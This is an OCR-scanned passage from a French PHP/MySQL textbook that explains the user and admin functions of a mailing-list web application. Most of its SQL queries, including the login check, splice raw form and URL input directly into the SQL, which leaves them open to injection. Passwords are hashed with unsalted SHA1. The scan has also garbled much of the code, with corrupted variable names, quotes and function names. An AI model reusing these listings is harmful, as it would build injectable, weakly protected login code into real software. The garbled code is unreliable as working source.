disponibles ou tout 
simplement s'authentifier. 
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Nous allons d'abord nous interesser a la creation d'un nouveau compte et a l'ouverture 
d'une session. Nous verrons un peu plus loin comment afficher les informations sur les 
listes disponibles. 

Creation d'un nouveau compte 

Lorsqu'un utilisateur selectionne l'option New Account, Taction new account est activee. 
Cette action active a son tour le code suivant de index.php : 

case ' new-account ' : 

// On se debarrasse des variables de session 
session_destroy ( ) ; 
display_account_f orm( ) ; 
break; 

} 

Ce code met fin a la session de l'utilisateur s'il etait connecte, et affiche le formulaire de 
creation de compte (voir la Figure 28.5). 
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New Account 



Real Name: 
Email Address: 



Requested Email Format: Text Only 




ZEES 



Figure 28.5 

Le formulaire de creation d'un nouveau compte permet aux utilisateurs de saisir les informations 
les concernant. 



Ce formulaire est produit par la fonction display account form( ) de la bibliotheque 
output Jns.php. Cette fonction est utilisee egalement dans Taction account settings, 
pour afficher un formulaire permettant a l'utilisateur de configurer son compte. Si elle 
est invoquee dans Taction account settings, le formulaire est automatiquement 
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rempli avec les informations connues sur l'utilisateur. Ici, ce formulaire est vide, pret a 
recevoir les informations du nouveau compte. Cette fonction se contentant de produire 
du code HTML, nous ne l'etudierons pas ici. 

Le bouton d'envoi de ce formulaire invoque Taction store account. Voici le code de 
cette action : 

case 'store-account': 

if (store_account ($_SESSI0N[ ' normal_user ' ] , 
S_SESSI0N[ 'admin_user ' ] , $_P0ST) ) { 
$action = ' ' ; 

} 

if ( !check_logged_in( ) ) { 

display_login_f orm($action) ; 

} 

break; 

} 

La fonction store account () enregistre les informations relatives au compte dans la 
base de donnees. Le code de cette fonction est presente dans le Listing 28.4. 

Listing 28.4 : La fonction store _account() de mlmjfns.php — Cette fonction enregistre 
les informations relatives a un compte dans la base de donnees 



// Ajoute un nouvel inscrit dans la base de donnees ou permet a un 
// utilisateur de modifier son profil. 

function store_account ($normal_user, $admin_user, $details) { 
if ( !filled_out($details) ) { 
echo "<p>All fields must be filled in. Try again. </p>"; 
return false; 
} else { 

if (subscribe r_exists($det ails [ ' email ' ] ) ) { 

// Verifie qu'il est connecte sous le compte qu'il essaie de 
// modifier. 

if (get_email( )==$details[ 'email' ] ) { 
$query = "update subscribers set 

realname = ' " .$details[realname] . " ' , 
mimetype = ' " .$details[mimetype] . " ' 
where email = ' " .$details[email] ; 

if ($conn=db_connect( ) ) { 
if ($conn->query ($query) ) { 

return true; 
} else { 

return false; 

} 

} else { 

echo "<p>Could not store changes. </p>" ; 
return false; 

} 
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} else { 

echo "<p>Sorry, that email address is already registered 
here.</p> 

<p>You will need to log in with that address to 
change its settings. </p>" ; 
return false; 

} 

} else { 

// new account 

$query = "insert into subscribers 

values ( ' " .$details[email] . " ' , 

' " .$details[realname] . " ' , 
1 " .$details[mimetype] . " 1 , 
shal ( ' " .$details[new_password] . " ' ) , 

0)"; 

if ($conn=db_connect( ) ) { 
if ($conn->query ($query) ) { 

return true; 
} else { 

return false; 

} 

} else { 

echo "<p>Could not store new account. </p>" ; 
return false; 

} 

} 

} 

} 



Cette fonction commence par verifier que l'utilisateur a bien rempli les champs neces- 
saries. 

Si tout se passe bien, elle cree ensuite un nouvel utilisateur ou met a jour les informa- 
tions du compte si l'utilisateur existe deja. Un utilisateur ne peut mettre a jour les 
donnees relatives a son compte que s'il est deja authentine. 

La fonction get email ( ) s'occupe de cette verification et recupere l'adresse e-mail de 
l'utilisateur authentine. Nous reviendrons sur ce point un peu plus loin, puisque nous 
avons recours a des variables de session qui sont configurees lorsque l'utilisateur se 
connecte. 



Ouvrir une session 

Si un utilisateur remplit le formulaire de connexion que nous avons vu a la Figure 28.4 
et qu'il clique sur le bouton Log In, il active le script index.php apres avoir defini les 
variables email et password. Cette procedure active le code de connexion qui se trouve 
dans la phase de pretraitement du script : 

// On doit traiter les requetes de connexion et de deconnexion 
// avant toute chose. 
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if ( ($_P0ST[ 'email' ]) && ($_P0ST[ ' password ']) ) { 

$login = login ($_P0ST[ 'email' ] , $_P0ST[ ' password ']) ; 

if($login == 'admin') { 
$status .= "<p style=\ "padding-bottom: 50px\"> 

<strong>" .get_real_name($_POST[ 'email' ] ) . "</strong> 
logged in successfully as 
<strong>Administrator</strong> .</p>" ; 
$_SESSI0N[ 'admin_user' ] = $_P0ST[ ' email '] ; 

} else if($login == 'normal') { 
$status .= "<p style=\ "padding-bottom: 50px\"> 

<strong>" .get_real_name($_POST[ 'email' ] ) . "</strong> 
logged in successfully. </p>" ; 
$_SESSI0N[ 'normal_user' ] = $_P0ST[ ' email '] ; 

} else { 

$status .= "<p style=\ "padding-bottom: 50px\ ">Sorry , we 
could not log you in with that email address 
and password . </p>" ; 

} 

} 

if($action == 'log-out') { 
unset ($action) ; 
$_SESSION=array() ; 
session_destroy ( ) ; 

} 

Comme vous pouvez le constater, nous essayons d'abord de connecter l'utilisateur en 
appelant la fonction login () de la bibliotheque user_auth_fns.php. Celle-ci etant un 
peu differente des fonctions de connexion que nous avons deja utilisees, nous allons 
nous y attarder un peu. Le code de cette fonction est presente dans le Listing 28.5. 

Listing 28.5 : La fonction loginQ de user_auth_fns.php — Cette fonction verifie les 
informations d'ouverture de session d'un utilisateur 



function login($email, $password) { 

// Verifie le nom de l'utilisateur et son mot de passe avec 
// la base de donnees. 

// Si c'est bon, on retourne le type d'ouverture de session. 
// Sinon on retourne false. 

// connect to db 
$conn = db_connect( ) ; 
if (!$conn) { 
return 0; 

} 

$query = "select admin from subscribers 
where email=' " .$email. " ' 

and password = shal ( ' " .$password. " ' ) " ; 

$result = $conn->query ($query) ; 
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if (!$result) { 
return false; 

} 

if ($result->num_rows<1 ) { 
return false; 

} 

$row = $result->f etch_array ( ) ; 

if($row[0] == 1) { 

return 1 admin ' ; 
} else { 

return 1 normal ' ; 

} 

} 



Auparavant, les fonctions de connexion renvoyaient true si la connexion avait reussi et 
false dans le cas contraire. Ici, nous retournons toujours false si la connexion a 
echoue, mais nous renvoyons le type de l'utilisateur, c'est-a-dire ' admin 1 ou ' normal 1 , 
si elle a reussi. Cette information provient de la valeur enregistree dans la colonne 
admin de la table subscribers, pour une combinaison donnee de l'adresse e-mail et du 
mot de passe. Si la requete ne produit aucun resultat, la fonction renvoie false. Si un 
utilisateur est un administrateur, cette valeur vaut 1 (true) et nous retournons 1 admin ' . 
Sinon nous retournons 'normal'. 

Apres 1' execution de cette fonction, nous enregistrons une variable de session pour 
conserver une trace de l'identite de notre utilisateur. Cette variable s'appelle 
admin user s'il s'agit d'un administrateur, normal user dans le cas d'un utilisateur 
classique. Dans un cas comme dans 1' autre, la variable de session prend comme valeur 
l'adresse e-mail de l'utilisateur. Pour simplifier la verification de l'adresse e-mail d'un 
utilisateur, nous nous servons de la fonction get email ( ) que nous avons deja mentionnee 
et qui est presentee dans le Listing 28.6. 

Listing 28.6 : La fonction get_email() de mlmjfns.php — Cette fonction retourne 
l'adresse e-mail de l'utilisateur authentifie 



function get_email() { 

if (isset ($_SESSI0N[ ' normal_user ' ] ) ) { 
return $_SESSI0N[ ' normal_user ' ] ; 

} 

if (isset ($_SESSI0N[ 'admin_user' ]) ) { 
return $_SESSI0N[ ' admin_user ' ] ; 

} 

return false; 

} 
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De retour au programme principal, nous indiquons a l'utilisateur s'il s'est authentifie ou 
non, et a quel niveau. 

Le resultat de la tentative d'ouverture de session est presente a la Figure 28.6. 
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Figure 28.6 

Le systeme indique que la connexion a reussi. 

Maintenant que notre utilisateur s'est authentifie, il peut executer les fonctions qui sont 
a sa disposition. 



Implementation des fonctions de l'utilisateur 

Apres s'etre authentines, les utilisateurs doivent pouvoir choisir parmi cinq options : 

■ consulter les listes disponibles pour s'y inscrire ; 

■ s' inscrire a une liste et annuler une inscription ; 

■ modifier la maniere dont leur compte est configure ; 

■ modifier leur mot de passe ; 

■ se deconnecter. 

Vous retrouverez la plupart de ces options aux Figures 28.6 a 28.9. Nous allons maintenant 
nous interesser a 1' implementation de chacune d'elles. 
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Consultation des listes 

Nous allons implementer un certain nombre d'options pour afficher les listes dispo- 
nibles et les informations qui y sont associees. A la Figure 28.6, vous pouvez voir 
deux de ces options : Show My Lists, qui affiche les listes auxquelles l'utilisateur 
est inscrit, et Show Other Lists, qui affiche les listes auxquelles l'utilisateur n'est 
pas inscrit. 

Si vous revenez a la Figure 28.4, vous constaterez qu'il existe une autre option, Show 
All Lists, qui affiche toutes les listes du systeme. Pour que notre systeme soit plus 
simple a utiliser, il est preferable de limiter le nombre de resultats affiches sur chaque 
page (on peut choisir par exemple dix resultats par page) mais, pour rester simple, nous 
n'avons pas encore implemente cette fonctionnalite. 

Ces trois options activent respectivement les actions show my lists, show other 
lists et show all lists. Comme vous l'avez probablement deja remarque, toutes ces 
actions fonctionnent de la meme maniere. Voici leur code : 

case 'show-all-lists': 

display_items( 'All Lists', get_all_lists( ) , 'information', 
' show-archive ',''); 

break; 

case 'show-other-lists': 

display_items( 'Unsubscribed Lists' , 

get_unsubscribed_lists(get_email( ) ) , 
' information ' , ' show-archive ' , 
' subscribe ' ) ; 

break; 
case ' ' : 

case ' show-my-lists ' : 

display_items ( ' Subscribed Lists ' , 

get_subscribed_lists(get_email( ) ) , 
' information ' , ' show-archive ' , 
' unsubscribe ' ) ; 

break; 

Comme vous pouvez le constater, toutes ces actions appellent la fonction 
display items ( ) de output _fns.php, mais a chaque fois avec des parametres differents. 
Elles utilisent egalement la fonction get email (), que nous avons deja vue, afm de 
recuperer l'adresse e-mail de l'utilisateur. 

La Figure 28.7 montre a quoi sert cette fonction dans la production de la page Show 
Other Lists. 

Le code de la fonction display items ( ) est presente dans le Listing 28.7. 
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Figure 28.7 

La fonction display_items() intervient dans la presentation des listes auxquelles I'utilisateur n'est 
pas abonne. 



Listing 28.7 : La fonction display _items() de outputjns.php — Cette fonction est 
utilisee pour afficher la liste des elements avec les actions associees 



function display_items($title, $list, $action1='', $action2='', 

$action3= ' ' ) { 

global $table_width; 

echo "<table width=\ "$table_width\ " cellspacing=\ "0\ " 
cellpadding=\ "0\ " border=\ "0\ ">" ; 

// Compte le nombre d' actions 

$actions=( ($action1 !=' ' ) + ($action2 ! = ' ' ) + ($action3 !='')) ; 
echo "<tr> 

<th colspan=\"" . (1+$actions) . "\" bgcolor=\ "#5B69A6\ ">" 

.$title. "</th> 

</tr>"; 

// Compte le nombre de lignes 
$items=sizeof ($list) ; 

if($items == 0) { 
echo "<tr> 
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<td colspan=\" " . (1+$actions) . " \ " align=\ " center\ ">No 
Items to Display</td> 
</tr>"; 
} else { 

// Affiche chaque ligne 
for($i=0; $i<$items; $i++) { 
if($i%2) { 

// Alterne les couleurs de fond 
$bgcolor="#ffffff " ; 
} else { 
$bgcolor="#ccccff " ; 

} 

echo "<tr> 

<td bgcolor=\"".$bgcolor."\" 

width=\"".($table_width - ($actions * 149) ) . " \ ">" ; 

echo $list[$i] [1 ] ; 

if ($list[$i] [2] ) { 

echo " - " .$list[$i] [2] ; 

} 

echo "</td>"; 

// Cree des boutons pour trois actions au maximum par ligne. 
for($j=1; $j<=3; $j++) { 
$var="action" .$j ; 

if($$var) { 

echo "<td bgcolor=\"".$bgcolor."\" width=\ 11 149\ ">" ; 
// Les boutons d ' af f ichage/previsualisation sont 
// particuliers car ce sont des liens vers un fichier 
if(($$var == 1 preview-html 1 ) || ($$var == 'view-html') || 
($$var == 'preview-text') || ($$var == 'view-text')) { 
display_preview_button($list[$i] [3] , $list[$i] [0] , 

$$var) ; 

} else { 

display_button($$var, '&id=' . $list[$i][0] ); 

} 

echo "</td>"; 

} 

} 

echo "</tr>\n"; 

} 

echo "</table>"; 

} 

} 
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Cette fonction affiche un tableau d'elements, chacun pouvant etre associe au maximum 
a trois boutons d' action. Cette fonction accepte cinq parametres : 

■ $title est le titre qui apparait en haut du tableau. Dans le cas presente a la 
Figure 28.7, ce titre est Unsubscribed Lists, comme nous l'avons vu dans le code de 
Taction Show Other Lists. 

■ $list est un tableau d'elements a af richer dans chaque ligne du tableau. Ici, il s'agit 
d'un tableau contenant les listes auxquelles l'utilisateur n'est pas inscrit, que nous 
construisons dans la fonction get unsubscribed lists (), sur laquelle nous 
reviendrons dans un instant. II s'agit d'un tableau a plusieurs dimensions, chaque 
ligne du tableau contenant jusqu' a quatre donnees sur chaque ligne. 

- $list[n][0] contient l'identificateur de 1' element, qui correspond generalement a 
un numero de ligne. Cela fournit aux boutons d' action l'identificateur de la ligne sur 
laquelle ils doivent travailler. Dans notre cas, nous recuperons ces identificateurs 
dans la base de donnees. 

- $list[n] [1 ] doit contenir le nom de 1' element. II s'agit du texte affiche pour un 
element particulier. Par exemple, dans le cas de la Figure 28.7, le nom de T element 
dans la premiere ligne du tableau est PHP Tipsheet. 

- $list [ n ] [ 2 ] et $list [ n ] [ 3 ] sont facultatifs. Nous nous en servons pour passer les 
informations supplementaires. Ils correspondent respectivement a du texte et a un 
identificateur. Nous verrons un exemple utilisant ces deux parametres lorsque nous 
etudierons Taction View Mail dans la section "Implementation des fonctions admi- 
nistratives". 

Les parametres 3, 4 et 5 de la fonction sont facultatifs et servent a passer les trois 
actions qui seront affichees sur les boutons correspondant a chaque article. A la 
Figure 28.7, il s'agit des trois boutons d'action Information, Show Archive et Subs- 
cribe. 

Nous obtenons ces trois boutons pour la page Show All Lists en passant les noms des 
actions, information, show archive et subscribe. Lorsque Ton appelle la fonction 
display button (), ces actions sont transformers en boutons sous-titres et Taction 
appropriee leur est affectee. 

Chacune des actions Show appelle la fonction display items ( ) d'une maniere diffe- 
rente, comme vous pouvez le constater en examinant leur code. Ces actions sont 
caracterisees non seulement par des boutons d'action et des titres differents, mais 
egalement par une fonction particuliere pour construire le tableau des elements a 
afficher. Show All Lists se sert de la fonction get all lists ( ), Show Other Lists, de 
la fonction get unsubscribed lists () et Show My Lists, de la fonction 
get subscribed lists ( ) . Toutes ces fonctions ont une structure identique et sont definies 
dans la bibliotheque de fonctions mlmjns.php. 
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Nous allons maintenant nous interesser a get unsubscribed lists ( ) , puisqu'il s'agit 
de l'exemple dont nous nous sommes occupes jusqu'a maintenant. Vous trouverez le 
code de la fonction get unsubscribed lists ( ) dans le Listing 28.8. 

Listing 28.8 : La fonction get_unsubscribed_lists() de mlm_fns.php — Cette fonction est 
utilisee pour construire un tableau contenant les listes de diffusion auxquelles 
I'utilisateur n'est pas abonne 



function get_unsubscribed_lists ($email) { 
$list = array ( ) ; 

$query = "select lists . listid , listname, email from lists 

left join sub_lists on lists. listid = sub_lists . listid 
and email= ' " . $email . " ' where email is NULL 
order by listname" ; 

if ($conn=db_connect ( ) ) { 

$result = $conn->query ($query) ; 
if ( !$result) { 

echo '<p>Unable to get list from database. </p>' ; 

return false; 

} 

$num = $result->num_rows ; 
for($i = 0; $i<$num; $i++) { 

$row = $result->f etch_array ( ) ; 

array_push($list, array ($row[0] , $row[1])); 

} 

} 

return $list; 

} 



Comme vous pouvez le constater, cette fonction necessite une adresse e-mail qui doit 
etre celle de I'utilisateur courant. La fonction get subscribed lists () exige egale- 
ment une adresse e-mail en parametre, contrairement a la fonction get all lists (), 
pour des raisons evidentes. 

Apres avoir recupere l'adresse e-mail d'un abonne, nous nous connectons a la base de 
donnees et nous recuperons toutes les listes auxquelles cet abonne n'est pas inscrit. 
Nous nous servons d'une jointure LEFT JOIN pour trouver les elements qui ne corres- 
pondent pas. Puis nous analysons le resultat dans une boucle et nous construisons le 
tableau ligne par ligne grace a la fonction integree array push(). 

Maintenant que nous savons comment cette liste est produite, interessons-nous aux 
boutons d' action associes. 
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Affichage des informations d'une liste 

Le bouton Information presente a la Figure 28.7 declenche Taction ' information ' : 

case ' information ' : 

display_information($_GET[ ' id ' ] ) ; 
break; 

Pour comprendre a quoi sert la fonction display information (), examinons la 
Figure 28.8. 



A »V,mid-; 

File Edit Via, History Bpakma.ki Tpvk Help 

- Q | l_, http://r[n:a[hps!/piipniysqW^chapter30And t a. P hp?Bctmn^infarmBtian6iid^2 | ^ | > | 



Pyramid-MLM - Information 



lange Password 1 1 >-^j count Settings 

PHP Tipsheet 

Tips for PHP developers. 
Number of subscribers^ 
Number of messages in archived 



w My Lists 



m Other Lists | ><ob Out 



Figure 28.8 

La fonction display_information() affiche la presentation d'une liste de diffusion. 



Cette fonction affiche des informations generales sur une liste de diffusion particuliere. 
Elle indique le nombre d'abonnes inscrits ainsi que le nombre de bulletins envoyes a 
cette liste disponibles dans 1' archive. 

Le code de cette fonction est presente dans le Listing 28.9. 

Listing 28.9 : La fonction display _information() de outputjfns.php — Cette fonction 
affiche les informations d'une liste 



function display_information($listid) { 
if(!$listid) { 
return false; 

} 

$info=load_list_info($listid) ; 
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if($info) { 

echo "<h2>" .pretty($info[listname] ) . "</h2> 
<p>" .pretty($info[blurb] ) . " 

</p><p>Number of subscribers: " .$info[subscribers] . " 
</p><p>Number of messages in archive:" 
.$info[archive] . "</p>" ; 

} 

} 



La fonction display information ( ) utilise deux autres fonctions pour l'aider dans sa 
tache : la fonction load list info ( ) et la fonction pretty ( ) . La premiere recupere les 
informations dans la base de donnees, tandis que la seconde se contente de formater 
les donnees de la base de donnees en supprimant les barres obliques, en transformant les 
fins de ligne en sauts de ligne HTML, etc. 

Penchons-nous rapidement sur le code de la fonction load list info ( ) , qui est dermic 
dans la bibliotheque de fonctions mlm_fns.php. Son code est presente dans le 
Listing 28.10. 

Listing 28.10 : La fonction loadJistJnfoQ de loadjistjnfo — Cette fonction genere 
un tableau contenant les informations d'une liste 



function load_list_inf o($listid) { 
if(!$listid) { 
return false; 

} 

if ( ! ($conn=db_connect ( ) ) ) { 
return false; 

} 

$query = "select listname, blurb from lists where listid = 

' " .$listid. ; 
$result = $conn->query ($query) ; 

if(!$result) { 

echo "<p>Cannot retrieve this list.</p>"; 
return false; 

} 

$info = $result->fetch_assoc() ; 

$query = "select count(*) from sub_lists where listid = 

' " .$listid. ; 
$result = $conn->query ($query) ; 

if($result) { 
$row = $result->f etch_array ( ) ; 
$info[ ' subscribers ' ] = $row[0]; 

} 
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$query = "select count(*) from mail where listid = ' " . $listid . " ' 
and status = ' SENT ' " ; 

$result = $conn->query ($query) ; 

if($result) { 

$row = $result->f etch_array ( ) ; 
$info[ ' archive ' ] = $row[0]; 

} 

return $info; 

} 



Cette fonction effectue trois requetes dans la base de donnees pour recuperer le nom et 
les informations generales d'une liste a partir de la table lists, le nombre d'abonnes a 
partir de la table sub lists et le nombre de bulletins envoyes a partir de la table mail. 

Affichage des archives d'une liste 

En plus d'afficher les informations generales d'une liste, les utilisateurs peuvent lire les 
e-mails qui ont deja ete envoyes a une liste de diffusion en cliquant sur le bouton Show 
Archive. Ce bouton active Taction show archive, qui execute le code suivant : 

case 'show-archive': 

display_items( 'Archive For ' . get_list_name($_GET[ ' id ' ] ) , 
get_archive($_GET[ ' id ' ] ) , ' view-html ' , 
' view-text ' , ' ' ) ; 

break; 

Une fois encore, cette fonction se sert de la fonction display items ( ) pour afficher les 
differents elements correspondant aux e-mails qui ont ete envoyes a la liste. Ces 
elements sont recuperes a l'aide de la fonction get archive () de mlm_fns.php. Son 
code est presente dans le Listing 28.11. 

Listing 28.11 : La fonction get_archive() de mlmjfns.php — Cette fonction construit 
un tableau contenant les bulletins archives d'une liste donnee 



function get_archive($listid) { 

// Renvoie un tableau contenant les e-mails archives de cette 
// liste. Ce tableau contient des lignes (mailid, subject). 

$list = array ( ) ; 

$listname = get_list_name($listid) ; 

$query = "select mailid, subject, listid from mail 

where listid = ' " . $listid . " ' and status = 'SENT' 
order by sent" ; 

if ($conn=db_connect( ) ) { 

$result = $conn->query ($query) ; 
if(!$result) { 
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echo "<p>Unable to get list from database. </p>" ; 
return false; 

} 

$num = $result->num_rows ; 

for($i = 0; $i<$num; $i++) { 
$row = $result->f etch_array ( ) ; 
$arr_row = array ($row[0] , $row[1], 

$listname, $listid); 
array_push($list, $arr_row) ; 

} 

} 

return $list; 

} 



Cette fonction va une nouvelle fois chercher dans la base de donnees les informations 
necessaries (c'est-a-dire ici les informations sur les e-mails qui ont ete envoyes) et 
construit un tableau qui pourra etre passe a la fonction display items ( ) . 

Inscriptions et desinscriptions 

Dans la liste des listes de diffusion presentee a la Figure 28.7, chaque liste possede un 
bouton permettant aux utilisateurs de s'inscrire. De meme, si les utilisateurs se servent 
de l'option Show My Lists pour afficher les listes auxquelles ils sont deja inscrits, ils 
verront un bouton Unsubscribe a cote de chaque liste. 

Ces boutons activent les actions subscribe et unsubscribe qui correspondent au code 
suivant : 

case ' subscribe ' : 

subscribe(get_email( ) , $_GET[ ' id ' ] ) ; 
display_items( 'Subscribed Lists' , 

get_subscribed_lists(get_email( ) ) , 
'information', 'show-archive', 'unsubscribe'); 

break; 

case ' unsubscribe ' : 

unsubscribe (get_email( ) , $_GET[ ' id ' ] ) ; 
display_items( 'Subscribed Lists' , 

get_subscribed_lists(get_email() ) , 
'information', 'show-archive', 'unsubscribe'); 

break; 

Dans les deux cas, nous appelons une fonction, subscribe () ou unsubscribe ( ), puis 
nous affichons a nouveau la liste des listes de diffusion auxquelles l'utilisateur est 
abonne, en appelant une nouvelle fois la fonction display items ( ) . 

Les fonctions subscribe ( ) et unsubscribe ( ) sont presentees dans le Listing 28.12. 
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Listing 28.12 : Les fonctions subscribed et unsubscribeQ de mlmjns.php — Ces fonctions 
permettent a I'utilisateur de s'abonner ou de se desabonner 



// Abonnement de cette adresse mail a la liste 
function subscribe ($email , $listid) { 

if (( !$email) || (!$listid) || ( ! list_exists($listid) ) 
|| ( !subscriber_exists($email) ) ) { 
return false; 

} 

// Si l'adresse est deja abonnee, on sort 
if (subscribed($email, Slistid)) { 
return false; 

} 

if ( ! ($conn=db_connect ( ) ) ) { 
return false; 

} 

$query = "insert into sub_lists values ( ' " .$email. " ' , $listid)"; 

$result = $conn->query ($query) ; 
return $result; 

} 

// Desabonne cette adresse mail de la liste 
function unsubscribe($email, $listid) { 

if ( ( !$email) | | ( !$listid) ) { 
return false; 

} 

if ( ! ($conn=db_connect( ) ) ) { 
return false; 

} 

$query = "delete from sub_lists where email = ' " . $email . " ' and 
listid = '".$listid. ; 

$result = $conn->query ($query) ; 
return $result; 

} 



La fonction subscribe() ajoute une ligne dans la table sub lists correspondant a 
1' inscription, tandis que unsubscribe ( ) supprime cette ligne. 

Modification des parametres d'un compte 

Lorsque I'utilisateur clique sur le bouton Account Settings, Taction account settings 
est executee. Voici le code de cette action : 

case 'account-settings': 

display_account_f orm(get_email( ) , 

get_real_name ( get_email ( ) ) , 
get_mimetype(get_email( ) ) ) ; 

break; 
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Comme vous pouvez le constater, nous reutilisons la fonction display account f orm( ) 
dont nous nous sommes deja servis pour creer le compte. Cependant, nous lui passons cette 
fois-ci les informations relatives a l'utilisateur courant, qui seront recopiees dans le formu- 
laire pour etre modifiees plus facilement. Lorsque l'utilisateur clique sur le bouton d' envoi 
de ce formulaire, cela active Taction store account, comme nous l'avons vu plus haut. 

Changement des mots de passe 

Le fait de cliquer sur le bouton Change Password active Taction change password, qui 
execute le code suivant : 

case 'change-password': 

display_password_f orm( ) ; 
break; 

La fonction display password form() de la bibliotheque output Jhs.php se contente 
d'afficher un formulaire permettant a l'utilisateur de changer son mot de passe (voir 
Figure 28.9). 
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Figure 28.9 

La fonction display_password_form() permet aux utilisateurs de changer leur mot de passe. 



Lorsqu'un utilisateur clique sur le bouton Change Password en bas de ce formulaire, 
Taction store change password est activee. Voici le code correspondant a cette action : 

case 'store-change-password': 

if (change_password(get_email( ) , $_P0ST[ 'old_passwd' ] , 
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$_POST[ ' new_passwd ' ] , $_POST[ ' new_passwd2 ' ] ) ) { 
echo "<p style=\"padding-bottom: 50px\">OK: Password 
changed. </p>" ; 

} else { 

echo "<p style=\"padding-bottom: 50px\ ">Sorry , your 

password could not be changed. </p>" ; 
display_password_f orm( ) ; 

} 

break; 

Comme vous pouvez le constater, ce code tente de modifier le mot de passe avec la 
fonction change password () et renvoie le resultat de cette operation. La fonction 
change password () se trouve dans la bibliotheque de fonctions user_auth_fns.php et 
son code est presente dans le Listing 28.13. 

Listing 28.13 : La fonction change _password() de user_auth_fns.php — Cette fonction 
valide et met a jour le mot de passe d'un utilisateur 



function change_password($email, $old_password , $new_password , 

$new_password_conf ) { 
// Change le mot de passe de email/old_password en new_password 
// Renvoie true ou false 



// Si l'ancien mot de passe est correct, change ce mot de passe 
// en new_password et renvoie true, sinon renvoie false, 
if (login($email, $old_password) ) { 

if ($new_password==$new_password_conf ) { 
if (!($conn = db_connect ( ) ) ) { 
return false; 

} 

$query = "update subscribers 

set password = shal ( ' " .$new_password . " ' ) 
where email = '".$email. ; 

$result = $conn->query ($query) ; 
return $result; 
} else { 

echo "<p>Your passwords do not match. </p>"; 

} 

} else { 

echo "<p>Your old password is incorrect . </p>" ; 

} 

return false; // old password was wrong 

} 



Cette fonction est analogue aux autres fonctions de modification des mots de passe que 
nous avons deja etudiees. Elle compare les deux nouveaux mots de passe saisis par 
l'utilisateur pour s'assurer qu'ils sont identiques et, si c'est bien le cas, tente de mettre 
a jour le mot de passe de l'utilisateur dans la base de donnees. 
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Fermeture de session 

Lorsqu'un utilisateur clique sur le bouton Log Out, il declenche Taction log out. Le 
code execute par cette action dans le script principal se trouve en fait dans la section de 
pretraitement de ce script : 

if ($action == 'log-out') { 
unset($action) ; 
$_SESSI0N=array( ) ; 
session_destroy ( ) ; 

} 

Ce fragment de code supprime les variables de session et detruit la session. Vous remarque- 
rez qu'il supprime egalement la variable action, ce qui signifie que nous entrons dans la 
section principale sans aucune action, ce qui implique l'execution du code suivant : 

default : 

if ( !check_logged_in( ) ) { 

display_login_f orm($action) ; 

} 

Cela permet a un autre utilisateur de se connecter ou a l'utilisateur courant de se reconnecter 
sous un autre nom. 

Implementation des fonctions administratives 

Lorsqu'un utilisateur se connecte en tant qu'administrateur, il beneficie des options 
supplementaires qui apparaissent a la Figure 28.10. 
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Figure 28.10 

Le menu des administrateurs permet de creer des listes de diffusion et d'effectuer 
leur maintenance. 
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Les administrateurs disposent de trois options supplementaires : Create List (pour creer 
une nouvelle liste de diffusion), Create Mail (pour creer un nouveau bulletin) et View 
Mail (pour afficher et envoyer les bulletins qui n'ont pas encore ete envoyes). Nous 
allons maintenant etudier chacune de ces options. 

Creation d'une nouvelle liste 

Si F administrateur choisit de creer une nouvelle liste en cliquant sur le bouton Create 
List, Faction create list est activee avec le code suivant : 

case ' create-list ' : 

display_list_f orm(get_email( ) ) ; 
break; 

La fonction display list f orm( ) affiche un formulaire permettant a F administrateur 
de saisir les informations relatives a la nouvelle liste. Elle se trouve dans la bibliotheque 
output Jns.php. Comme elle se contente de produire du code HTML, nous ne Fetudierons 
pas plus en detail. Son resultat apparait a la Figure 28. 1 1. 
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Figure 28. 1 1 

L'option Create List demande a /'administrateur de saisir le nom et la description de la nouvelle 
liste. 



Lorsque F administrateur clique sur le bouton Save List, Faction store list est activee 
avec le code suivant de index.php : 

case ' store-list ' : 

if (store_list($_SESSION[ 'admin_user' ] , $_P0ST)) { 
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echo "<p style=\ "padding-bottom: 50px\">New list 

added. </p>" ; 
display_items( 'All Lists', get_all_lists( ) , 

' information ' , 1 show-archive ',''); 

} else { 

echo "<p style=\ "padding-bottom: 50px\">List could not 
be stored. Please try again. </p>"; 

} 

break; 

Comme vous pouvez le constater, ce code essaie d'enregistrer les informations de la 
nouvelle liste et affiche ensuite le nouveau catalogue des listes de diffusion. Les details 
de la liste sont enregistres avec la fonction store list(), dont le code est presente 
dans le Listing 28.14. 

Listing 28.14 : La fonction store_list() de mlm_fns.php — Cette fonction ajoute 
une nouvelle liste de diffusion dans la base de donnees 



function store_list ($admin_user, $details) { 
if ( !filled_out($details) ) { 
echo "<p>All fields must be filled in. Try again. </p>"; 
return false; 
} else { 

if ( !check_admin_user($admin_user) ) { 
return false; 

// Comment cette fonction a-t-elle pu etre appelee par un 
// utilisateur qui n'est pas administrateur ? 

} 

if ( ! ($conn=db_connect ( ) ) ) { 
return false; 

} 

$query = "select count(*) from lists 

where listname = ' " . $details [ ' name ' ] ; 

$result = $conn->query ($query) ; 
$row = $result->f etch_array ( ) ; 

if($row[0] > 0) { 

echo "<p>Sorry, there is already a list with this 

name.</p>" ; 
return false; 

} 

$query = "insert into lists values (NULL, 

' " . $details[ ' name ']."', 
' " .$details[ 'blurb' ] ."')"; 

$result = $conn->query ($query) ; 
return $result; 

} 

} 
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Cette fonction effectue quelques verifications avant d'ecrire dans la base de donnees : 
elle s'assure que tous les details ont ete fournis, que l'utilisateur actuel est un adminis- 
trateur et que le nom de la liste est unique. Si tout se passe bien, la liste est ajoutee dans 
la table lists de la base de donnees. 



Transfert vers le serveur d'un nouveau bulletin 

Nous en arrivons finalement a la partie la plus delicate de cette application : le transfert 
et l'envoi des bulletins aux listes de diffusion. 

Lorsqu'un administrateur clique sur le bouton Create Mail, il active Taction create 
mail, dont voici le code : 

case ' create-mail ' : 

display_mail_form(get_email( ) ) ; 
break ; 

L' administrateur arrive alors sur le formulaire presente a la Figure 28.12. 



Figure 28.12 

L'option Create Mail 
fournit a I'adminis- 
trateur une interface 
permettant de trans- 
ferer vers le serveur 
les fichiers de son 
bulletin. 
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N'oubliez pas que, pour cette application, nous supposons que 1' administrateur a cree 
son bulletin hors ligne, en HTML et en texte brut, et qu'il transfere ces deux versions 
avant de les envoyer. Nous avons retenu cette approche pour que les administrateurs 
puissent se servir de leur traitement de texte favori pour creer leurs bulletins, ce qui rend 
notre application plus accessible. 
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Ce formulaire contient plusieurs champs qui doivent etre remplis par l'administrateur. 
En haut du formulaire se trouve un menu deroulant contenant les differentes listes de 
diffusion. L'administrateur doit egalement specifier le sujet du bulletin. 

Tous les autres champs du formulaire concernent les fichiers a transferer. lis sont situes 
face aux boutons Parcourir. Pour envoyer un bulletin, un administrateur doit preciser la 
